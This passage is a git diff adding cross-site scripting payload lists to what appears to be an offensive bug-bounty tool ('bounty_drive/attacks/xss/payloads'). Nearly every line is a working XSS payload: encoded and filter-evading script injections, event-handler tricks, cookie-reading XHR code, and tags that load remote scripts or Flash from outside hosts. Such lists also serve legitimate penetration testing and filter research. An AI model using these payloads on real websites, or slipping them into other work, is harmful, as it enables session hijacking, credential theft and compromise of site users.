data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> diff --git a/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt b/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt new file mode 100644 index 0000000..388ca5c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt @@ -0,0 +1,525 @@ +<script>alert(123);</script> +<ScRipT>alert("XSS");</ScRipT> +<script>alert(123)</script> +<script>alert("hellox worldss");</script> +<script>alert(XSS)</script> +<script>alert(XSS);</script> +<script>alert(XSS)</script> +><script>alert(XSS)</script> +<script>alert(/XSS)</script> +<script>alert(/XSS/)</script> +</script><script>alert(1)</script> +; alert(1); +)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(XSS)> +<IMG SRC=javascript:alert(XSS);> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(XSS)> +<img src=xss onerror=alert(1)> + + +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> + +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' + +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" + +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} + +<img/src=`%00` onerror=this.onerror=confirm(1) + +<form><isindex formaction="javascript&colon;confirm(1)" + +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; + +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> + +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? + +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> + +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ + +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 + +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> + +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> + +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script + +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} + +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> + +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X + +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> + +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a + +http://www.google<script .com>alert(document.location)</script + +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a + +<img/src=@&#32;&#13; onerror = prompt('&#49;') + +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; + +<script ^__^>alert(String.fromCharCode(49))</script ^__^ + +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( + +&#00;</form><input type&#61;"date" onfocus="alert(1)"> + +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> + +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ + +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> + +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> + +<script ~~~>alert(0%0)</script ~~~> + +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> + +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN + +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) + +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' + +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} + +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ + +<div/style="width:expression(confirm(1))">X</div> {IE7} + +<iframe/%00/ src=javaSCRIPT&colon;alert(1) + +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// + +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> + +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ + +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> + +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> + +</plaintext\></|\><plaintext/onmouseover=prompt(1) + +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} + +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> + +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> + +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> + +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> + +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> + +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> + +<var onmouseover="prompt(1)">On Mouse Over</var> + +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> + +<img src="/" =_=" title="onerror='prompt(1)'"> + +<%<!--'%><script>alert(1);</script --> + +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) + +<iframe/onreadystatechange=alert(1) + +<svg/onload=alert(1) + +<input value=<><iframe/src=javascript:confirm(1) + +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> + +http://www.<script>alert(1)</script .com + +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> + +<svg><script ?>alert(1) + +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> + +<img src=`xx:xx`onerror=alert(1)> + +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click + +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 + +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a + +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> + +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ + +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script + +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> + +<script>+-+-1-+-+alert(1)</script> + +<body/onload=&lt;!--&gt;&#10alert(1)> + +<script itworksinallbrowsers>/*<script* */alert(1)</script + +<img src ?itworksonchrome?\/onerror = alert(1) + +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) + +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe + +<script x> alert(1) </script 1=2 + +<div/onmouseover='alert(1)'> style="x:"> + +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> + +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> + +"><img src=x onerror=window.open('https://www.google.com/');> + +<form><button formaction=javascript&colon;alert(1)>CLICKME + +<math><a xlink:href="//jsfiddle.net/t846h/">click + +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> + +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> + +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> + +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG ><SCRIPT>alert(XSS)</SCRIPT>> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=jav ascript:alert(XSS);> +<IMG SRC=jav&#x09;ascript:alert(XSS);> +<<SCRIPT>alert(XSS);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +><s%2bcript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=javascript:alert(XSS)> +<BODY ONLOAD=alert(XSS)> +<INPUT TYPE=IMAGE SRC=javascript:alert(XSS);> +<IMG SRC=javascript:alert(XSS) +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; +scriptualert(EXSSE)/scriptu +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; 